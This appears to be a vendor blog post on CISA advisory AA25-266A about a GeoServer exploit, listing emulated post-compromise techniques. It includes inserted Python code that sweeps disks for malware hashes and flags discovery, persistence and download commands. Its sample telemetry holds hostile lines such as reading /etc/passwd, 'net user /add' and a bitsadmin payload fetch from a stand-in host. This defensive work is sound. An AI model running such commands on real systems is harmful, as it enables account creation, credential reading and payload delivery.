Response to CISA Advisory (AA25-266A): CISA Shares Lessons Learned from an Incident Response Engagement
CISA has published a Cybersecurity Advisory stressing the importance of promptly patching known exploited vulnerabilities and strengthening log management. AttackIQ has released assessment templates that emulate the attackers' behaviour so organizations can test their security controls. The key points are rapid vulnerability remediation, a well-rehearsed incident response plan, and centralized log monitoring. Published 2025-9-24 16:54:4, Author: securityboulevard.com

Introduction

On September 23, 2025, the Cybersecurity and Infrastructure Security Agency (CISA) released a Cybersecurity Advisory (CSA). The advisory highlights lessons learned from an incident response engagement CISA conducted at a U.S. federal civilian executive branch (FCEB) agency to reinforce the importance of prompt patching, as well as preparing for incidents by practicing incident response plans and by implementing logging and log aggregation in a centralized out-of-band location.

The CSA recounts an incident in which a U.S. federal civilian agency was compromised after attackers exploited a publicly disclosed vulnerability (CVE-2024-36401) in a GeoServer that allows unauthenticated users to gain remote code execution (RCE) on affected versions. The flaw had been published on June 30, 2024, and was added to CISA’s Known Exploited Vulnerabilities catalog on July 15, 2024. However, the agency had not yet patched the system, allowing adversaries to gain access first on July 11 and then again on July 24 through the same weakness. The intrusion lasted nearly three weeks before it was detected, during which the attackers conducted lateral movement inside the environment.

To prevent similar incidents, CISA stresses the importance of timely patching, especially for vulnerabilities cataloged as known exploited. Agencies and organizations should also ensure that incident response plans are current, exercised, and cover escalation procedures, third-party coordination, and tool access. Additionally, effective detection depends on comprehensive logging, centralized storage of logs, and continuous monitoring to identify unusual behavior. The advisory provides further technical details, including indicators of compromise and mappings to MITRE ATT&CK, to help defenders validate and strengthen their security measures.


AttackIQ has released two new assessment templates that include the post-compromise Tactics, Techniques and Procedures (TTPs) mentioned in the CSA to help customers validate their security controls and their ability to defend against sophisticated threats.

This assessment template emulates the GeoServer post-compromise Tactics, Techniques, and Procedures (TTPs) and subsequent Linux-host behaviors detailed in the CISA Advisory AA25-266A.

Persistence

Consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access.

Cron Job Persistence and Execution (T1053.003): This scenario uses the cron utility to schedule commands for initial or recurring execution.

Discovery

Consists of techniques that adversaries use to discover information related to the compromised environment.

Obtain Disk Space using “df” Command (T1082): This scenario executes the df command to obtain detailed file system disk space usage information.

Process Discovery using “ps aux” Command (T1057): This scenario executes the ps -aux command to list all running processes with comprehensive details.

Account Discovery (T1087.001): This scenario executes the cat /etc/passwd command to get a list of local accounts.

System Network Configuration Discovery through Linux Command Line (T1016): This scenario executes ifconfig to obtain information available about the system’s network configuration.

Obtain System Information using “uname” Command (T1082): This scenario executes the uname -a command to obtain CPU architecture, hostname, and kernel information.

Obtain System Date using “date” Command (T1124): This scenario executes the date command to obtain the current system time, date, and timezone.

Obtain Last System Boot using “who” Command (T1124): This scenario executes the who -b command to obtain the date and time of the last system boot.

Samples

This section contains the samples mentioned in the CSA.

2023-09 Stowaway Proxy Sample: The Stowaway Proxy Sample (SHA256: dff3e75f2f72f8123be76f010d7bd71f5f7508dfac84b2b52a721e779abc50c9) is downloaded to memory and saved to disk in two separate scenarios to test network and endpoint controls and their ability to prevent the delivery of known malicious samples.

2017-06 Linux Exploit Sample: The Linux Exploit Sample (SHA256: 42202a67748c6a5eb735e8241ef144462d9323894579a2f063fa2f82c91eca08) is downloaded to memory and saved to disk in two separate scenarios to test network and endpoint controls and their ability to prevent the delivery of known malicious samples.
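The endpoint side of the delivery test above is whether a known-bad file can land on disk and go unnoticed. As an added example (not code from the advisory or from AttackIQ), the following Python sweeps a directory tree and reports any file whose SHA-256 matches a known-bad list seeded with the two hashes the post gives for the Stowaway proxy and Linux exploit samples. The files created by demo() are constructed fixtures, not those samples, and the marker-file trick only exists to show what a hit looks like.

```python
"""Sweep a directory tree for files whose SHA-256 is on a known-bad list.

Added example, not code from the advisory or from AttackIQ. KNOWN_BAD holds
the two hashes the post lists for the Stowaway proxy and Linux exploit samples;
the files created in demo() are constructed fixtures, not those samples.
"""
import hashlib
import os
import tempfile

KNOWN_BAD = {
    "dff3e75f2f72f8123be76f010d7bd71f5f7508dfac84b2b52a721e779abc50c9": "Stowaway proxy sample (2023-09)",
    "42202a67748c6a5eb735e8241ef144462d9323894579a2f063fa2f82c91eca08": "Linux exploit sample (2017-06)",
}


def sha256_file(path, chunk_size=1 << 20):
    """Stream the file through SHA-256 so large binaries need not fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def sweep(root, known_bad=KNOWN_BAD):
    """Return (path, sha256, label) for every regular file under root whose digest is known bad.

    Symlinks are skipped so a link cannot make the sweep hash files outside root."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            if os.path.islink(path) or not os.path.isfile(path):
                continue
            digest = sha256_file(path)
            if digest in known_bad:
                hits.append((path, digest, known_bad[digest]))
    return hits


def demo():
    """Build a constructed fixture tree and sweep it twice.

    The first sweep uses a copy of the list extended with the hash of a marker
    file, to show a match; the second uses only the advisory hashes, which must
    not match harmless content."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "tmp"))
        with open(os.path.join(root, "notes.txt"), "w") as fh:
            fh.write("constructed benign file\n")
        marker = os.path.join(root, "tmp", "marker.bin")
        with open(marker, "wb") as fh:
            fh.write(b"constructed marker content, not a real sample")
        extended = dict(KNOWN_BAD)
        extended[sha256_file(marker)] = "constructed test marker"
        return sweep(root, extended), sweep(root)
```

Run sweep() against a staging directory after the delivery scenarios execute: a hit on either hash means the network and endpoint controls let the sample reach disk, while an empty result from sweep alone is not proof of prevention, since the samples may also exist only in memory.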

This assessment template emulates the SQL Server post-compromise Tactics, Techniques, and Procedures (TTPs) and subsequent Windows-host behaviors detailed in the CISA Advisory AA25-266A.

Persistence

Consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access.

Create Account (T1136.001): This scenario attempts to create a new user on the system with the net user Windows command.

Discovery

Consists of techniques that adversaries use to discover information related to the compromised environment.

System Network Connections Discovery (T1049): This scenario uses the native Windows command line tool netstat to collect active connections and any listening services running on the host.

Domain Administrator Accounts Discovery Via Net Command Script (T1087.002): This scenario executes the net group command to list domain administrator accounts.

Obtain Username using “whoami” Command (T1033): This scenario executes the native whoami command to receive details of the running user account.

File and Directory Discovery Script (T1083): This scenario executes the native dir command to discover files and directories and outputs to a temporary file.

System Information Discovery Script (T1082): This scenario executes the systeminfo command to collect information about the compromised system.

Enumerate Local System Accounts via net Command (T1087.001): This scenario executes the net user command to enumerate all local system accounts.

Internet Connection Discovery using certutil Command (T1016.001): This scenario executes the certutil utility to try and download a file from a website and save it to a temporary directory.

Internet Connection Discovery via ping to 8.8.8.8 (T1016.001): This scenario executes the ping command to check for Internet connectivity on compromised systems to determine if the system can communicate with its Command and Control (C2) servers.

Process Discovery Through Tasklist (T1057): This scenario enumerates processes running on the target asset through the tasklist Windows utility. The results are saved to a file in a temporary location.

Get IP Information through Windows Command Line (T1016): This scenario executes the ipconfig /all Windows command to retrieve information about all network adapters.

Command and Control

Consists of techniques that adversaries may use to communicate with systems under their control within a victim network. Adversaries commonly attempt to mimic normal, expected traffic to avoid detection.

BITS Jobs Script (T1197): This scenario employs the bitsadmin native command to create a BITS job and configure it to download a remote payload. The Background Intelligent Transfer Service (BITS) is a mechanism used by legitimate applications to use a system’s idle bandwidth to retrieve files without disrupting other applications.
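The value of running these scenarios is in checking whether the telemetry they generate is actually collected and alerted on. As an added example (not AttackIQ's or CISA's code), the following Python maps process-execution events to the technique IDs listed for both templates above, the Linux GeoServer scenarios and the Windows SQL Server scenarios, and raises an alert when a host runs several distinct discovery techniques inside a short window or any persistence or command-and-control technique at all. The event fields (host, os, ts, cmd), the 10-minute window, the 3-technique threshold and the sample telemetry are constructed assumptions, not values from the advisory.

```python
"""Map process-execution events to the ATT&CK techniques emulated by the two
AA25-266A assessment templates and flag hosts that show a discovery burst.
Added example, not AttackIQ or CISA code: the event fields (host, os, ts, cmd)
are a constructed stand-in for auditd EXECVE / Sysmon Event ID 1 records, and
the 10-minute window and 3-technique threshold are assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta
import re

# (technique id, tactic, program name, optional regex over the whole command line).
# First match wins, so "net user ... /add" is account creation, not enumeration.
RULES = {
    "linux": [
        ("T1053.003", "persistence", "crontab", None),
        ("T1082", "discovery", "df", None),
        ("T1057", "discovery", "ps", None),
        ("T1087.001", "discovery", "cat", re.compile(r"/etc/passwd")),
        ("T1016", "discovery", "ifconfig", None),
        ("T1082", "discovery", "uname", None),
        ("T1124", "discovery", "date", None),
        ("T1124", "discovery", "who", re.compile(r"(^|\s)-b\b")),
    ],
    "windows": [
        ("T1136.001", "persistence", "net", re.compile(r"\buser\b.*\s/add\b", re.I)),
        ("T1087.002", "discovery", "net", re.compile(r"\bgroup\b", re.I)),
        ("T1087.001", "discovery", "net", re.compile(r"\buser\b", re.I)),
        ("T1049", "discovery", "netstat", None),
        ("T1033", "discovery", "whoami", None),
        ("T1083", "discovery", "cmd", re.compile(r"\bdir\b", re.I)),
        ("T1082", "discovery", "systeminfo", None),
        ("T1016.001", "discovery", "certutil", re.compile(r"-urlcache", re.I)),
        ("T1016.001", "discovery", "ping", None),
        ("T1057", "discovery", "tasklist", None),
        ("T1016", "discovery", "ipconfig", None),
        ("T1197", "command-and-control", "bitsadmin", re.compile(r"/(transfer|addfile)\b", re.I)),
    ],
}

def program_name(cmd):
    """Basename of the first token, lower-cased, minus '.exe' (assumes an unquoted image path)."""
    parts = cmd.split(None, 1)
    if not parts:
        return ""
    name = re.split(r"[\\/]", parts[0])[-1].lower()
    return name[:-4] if name.endswith(".exe") else name

def classify(event):
    """Return (technique, tactic) for the first matching rule, or None."""
    prog = program_name(event["cmd"])
    for tech, tactic, rule_prog, pattern in RULES[event["os"]]:
        if prog == rule_prog and (pattern is None or pattern.search(event["cmd"])):
            return tech, tactic
    return None

def detect(events, window=timedelta(minutes=10), min_discovery=3):
    """High alert per persistence/C2 event; medium alert per host whose busiest window holds >= min_discovery techniques."""
    alerts, discovery = [], defaultdict(list)
    for ev in events:
        hit = classify(ev)
        if hit is None:
            continue
        tech, tactic = hit
        if tactic == "discovery":
            discovery[ev["host"]].append((datetime.fromisoformat(ev["ts"]), tech))
        else:
            alerts.append({"host": ev["host"], "severity": "high", "technique": tech, "cmd": ev["cmd"]})
    for host, hits in discovery.items():
        hits.sort()
        best = set()
        for i, (start, _) in enumerate(hits):
            # distinct discovery techniques in the window that opens at this event
            seen = {t for ts, t in hits[i:] if ts - start <= window}
            if len(seen) > len(best):
                best = seen
        if len(best) >= min_discovery:
            alerts.append({"host": host, "severity": "medium", "technique": "discovery-burst", "techniques": sorted(best)})
    return alerts

# Constructed sample telemetry, not advisory data: a Linux host running the GeoServer
# template's discovery set, a Windows host running the SQL Server set, one quiet host.
SAMPLE_EVENTS = [
    {"host": h, "os": o, "ts": "2025-09-23T" + t, "cmd": c}
    for h, o, t, c in [
        ("geo-srv-01", "linux", "10:00:00", "df -h"),
        ("geo-srv-01", "linux", "10:00:05", "ps aux"),
        ("geo-srv-01", "linux", "10:00:09", "cat /etc/passwd"),
        ("geo-srv-01", "linux", "10:00:15", "/sbin/ifconfig"),
        ("geo-srv-01", "linux", "10:00:30", "who -b"),
        ("geo-srv-01", "linux", "10:02:00", "crontab -"),
        ("build-01", "linux", "10:05:00", "df -h"),
        ("sql-srv-02", "windows", "11:00:00", r"C:\Windows\System32\net.exe user svc_emul S3cret! /add"),
        ("sql-srv-02", "windows", "11:00:10", "netstat -ano"),
        ("sql-srv-02", "windows", "11:00:20", 'net group "Domain Admins" /domain'),
        ("sql-srv-02", "windows", "11:00:40", r"cmd.exe /c dir /s C:\Users > C:\Windows\Temp\d.txt"),
        ("sql-srv-02", "windows", "11:00:50", "tasklist /v"),
        ("sql-srv-02", "windows", "11:01:00", "ipconfig /all"),
        ("sql-srv-02", "windows", "11:03:00", r"bitsadmin /transfer j1 http://example.invalid/p.bin C:\Windows\Temp\p.bin"),
    ]
]
```

Calling detect(SAMPLE_EVENTS) yields three high alerts (the cron job, the net user /add, the bitsadmin transfer) and a medium discovery-burst alert for each of the two emulated hosts, while the single df on the quiet host produces nothing. The point of the burst rule is that each discovery command is ordinary on its own; what the templates exercise, and what the advisory's call for centralized logging enables, is seeing them together on one host in a few minutes.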

Wrap-up

In summary, these assessment templates will evaluate security and incident response processes and support the improvement of your security control posture against the recent activities carried out by threat actors. With data generated from continuous testing and use of this assessment template, you can focus your teams on achieving key security outcomes, adjust your security controls, and work to elevate your total security program effectiveness against widely distributed and dangerous threats.

AttackIQ, the leading provider of Adversarial Exposure Validation (AEV) solutions, is trusted by top organizations worldwide to validate security controls in real time. By emulating real-world adversary behavior, AttackIQ closes the gap between knowing about a vulnerability and understanding its true risk. AttackIQ’s AEV platform aligns with the Continuous Threat Exposure Management (CTEM) framework, enabling a structured, risk-based approach to ongoing security assessment and improvement. The company is committed to supporting its MSSP partners with a Flexible Preactive Partner Program that provides turn-key solutions, empowering them to elevate client security. AttackIQ is passionate about giving back to the cybersecurity community through its free award-winning AttackIQ Academy and founding research partnership with MITRE Center for Threat-Informed Defense.


Source: https://securityboulevard.com/2025/09/response-to-cisa-advisory-aa25-266a-cisa-shares-lessons-learned-from-an-incident-response-engagement/